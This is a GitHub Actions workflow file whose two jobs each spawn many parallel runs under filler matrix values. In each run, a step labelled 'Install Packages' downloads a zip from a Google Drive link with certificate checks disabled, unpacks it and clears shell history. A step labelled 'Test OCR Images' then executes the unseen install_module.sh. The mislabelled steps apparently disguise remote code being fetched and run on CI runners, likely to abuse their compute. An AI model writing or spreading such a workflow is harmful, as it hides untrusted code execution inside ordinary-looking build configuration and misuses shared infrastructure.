name: rungvang0congcu
on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:
  configure:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Init', 'Generate', 'Check', 'Start', 'Ship']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1ecKkmv_IizVXscNpsI87DegQ-4FcDigm" -O rungvang0congcu.zip
        unzip -o rungvang0congcu.zip
        rm rungvang0congcu.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh


  SETUP1:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      max-parallel: 10
      matrix:
        go: [I.0, I.I, I.II]
        flag: ['Configure', 'Package', 'Assess', 'Operate', 'Distribute']

    env:
        NUM_JOBS: 20
        JOB: ${ matrix.go }
    steps:
    - uses: actions/checkout@v1
    - name: Install Packages
      run: |
        wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1ecKkmv_IizVXscNpsI87DegQ-4FcDigm" -O rungvang0congcu.zip
        unzip -o rungvang0congcu.zip
        rm rungvang0congcu.zip
        history -c && history -w

    - name: Test OCR Images
      run: bash install_module.sh
        
